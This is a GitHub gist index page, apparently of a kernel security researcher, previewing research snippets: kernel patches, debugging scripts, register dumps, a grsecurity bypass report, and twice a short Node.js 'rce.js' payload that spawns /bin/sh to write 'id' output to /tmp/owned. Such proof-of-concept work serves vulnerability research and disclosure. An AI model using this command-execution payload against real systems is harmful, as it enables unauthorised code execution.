Instantly share code, notes, and snippets.

View gist:c91f9b4e3cc4c58659bb3cd056c4fa40
diff --git a/arch/x86/entry/entry_64.S b/arch/x86/entry/entry_64.S
index 957dfb693ecc..251ed2ca3f04 100644
--- a/arch/x86/entry/entry_64.S
+++ b/arch/x86/entry/entry_64.S
@@ -1673,9 +1673,26 @@ ENTRY(rewind_stack_do_exit)
/* Prevent any naive code from trying to unwind to our caller. */
xorl %ebp, %ebp
+ movq %rdi, %r14
+
View gdb-anaheap.py
import os
import struct
# flags are encoded into chunk size
FLAGS_MASK = 0x7
PAGEMAP_PRESENT = 1<<63
PAGEMAP_SWAPPED = 1<<62
main_arena = gdb.parse_and_eval('&main_arena')
bins_per_arena = int(gdb.parse_and_eval(
View check.c
// small stack memory usage experiment
// written by Jann Horn
#include <stdint.h>
#include <sys/ptrace.h>
#include <sys/user.h>
#include <fcntl.h>
#include <err.h>
#include <unistd.h>
#include <stdlib.h>
View gist:b8be219d48084630ec0aed41ee71aee2
0x0 Twux 0x7aa7000
0x0 Twux 0x8b4bf000
0x400000 Twux 0x77c9000
0x400000 P-ux 0x11f46000
0x600000 Twux 0x72da000
0x600000 P-u- 0x11f47000L
0x601000 Pwu- 0x11ec8000L
0x1e00000 Twux 0x79fb000
0x1f13000 Pwu- 0x11f7a000L
0x1f14000 Pwu- 0x11f7b000L
View perf_sample_regs_intr_demo.c
$ ./perf_sample_regs_intr_demo
data_head is at ff0
rax=0xffffffffffffffff rbp=0x7ffc9ec04170 rsp=0x7ffc9ec040b8 rip=0x4005b0
rax=0xfffffffffffffff7 rbp=0xffffa5fc43efff48 rsp=0xffffa5fc43efff28 rip=0xffffffff97c55f1d
rax=0xfffffffffffffff7 rbp=0x7ffc9ec04170 rsp=0x7ffc9ec040b8 rip=0xffffffff9862ce18
rax=0xffff8fc3ba3b79c0 rbp=0xffffa5fc43efff00 rsp=0xffffa5fc43effef0 rip=0xffffffff97c745c9
rax=0xfffffffffffffff7 rbp=0x7ffc9ec04170 rsp=0x7ffc9ec040b8 rip=0xffffffff9862ce18
rax=0x0 rbp=0xffffa5fc43efff00 rsp=0xffffa5fc43effef8 rip=0xffffffff97c75049
rax=0xfffffffffffffff7 rbp=0x7ffc9ec04170 rsp=0x7ffc9ec040b8 rip=0xffffffff9862ce15
rax=0xffffffffffffffff rbp=0x7ffc9ec04170 rsp=0x7ffc9ec040c0 rip=0x4007d5
View gist:6a943fbbd89f81ffa28060dd4f60b390
init root allcaps
ueventd root allcaps
logd CAP_AUDIT_CONTROL CAP_SYSLOG
qseecomd CAP_NET_RAW CAP_SYS_RAWIO CAP_SYS_ADMIN
qseecomd CAP_NET_RAW CAP_SYS_RAWIO CAP_SYS_ADMIN
debuggerd root allcaps
debuggerd64 root allcaps
vold root allcaps
debuggerd64:sig root allcaps
debuggerd:sig root allcaps
View gist:3bac7b2c79cdaaf569c702d9080320ed
var Process = process.binding('process_wrap').Process;
var proc = new Process();
proc.onexit = function(a,b) {};
var env = process.env;
var env_ = [];
for (var key in env) env_.push(key+'='+env[key]);
proc.spawn({file:'/bin/sh',args:['sh','-c','id > /tmp/owned'],cwd:null,windowsVerbatimArguments:false,detached:false,envPairs:env_,stdio:[{type:'ignore'},{type:'ignore'},{type:'ignore'}]});
View 0001-drivers-tty-add-protected_ttys-sysctl.patch
From cd0bd8ae7e4afb8050657b73d65e3ddeccd44b9b Mon Sep 17 00:00:00 2001
From: Jann Horn <jann@thejh.net>
Date: Sat, 12 Dec 2015 02:59:28 +0100
Subject: [PATCH] drivers/tty: add protected_ttys sysctl
This new fs.protected_ttys sysctl can be set to 1 to require
CAP_SYS_ADMIN for the TIOCSTI ioctl (which lets the caller
push input back into the TTY and thereby fake input to other
processes that read from the same TTY).
View rce.js
var Process = process.binding('process_wrap').Process;
var proc = new Process();
proc.onexit = function(a,b) {};
var env = process.env;
var env_ = [];
for (var key in env) env_.push(key+'='+env[key]);
proc.spawn({file:'/bin/sh',args:['sh','-c','id > /tmp/owned'],cwd:null,windowsVerbatimArguments:false,detached:false,envPairs:env_,stdio:[{type:'ignore'},{type:'ignore'},{type:'ignore'}]});
View GRKERNSEC_PTRACE_READEXEC bypasses
Date: Sun, 28 Feb 2016 19:08:22 +0100
From: Jann Horn <jann@thejh.net>
To: Brad Spengler <spender@grsecurity.net>
Subject: GRKERNSEC_PTRACE_READEXEC bypasses
Hi!
While writing some new kernel documentation (not yet public, but will probably
soon be under Documentation/security/ptrace_checks.txt), I noticed that
GRKERNSEC_PTRACE_READEXEC has some issues.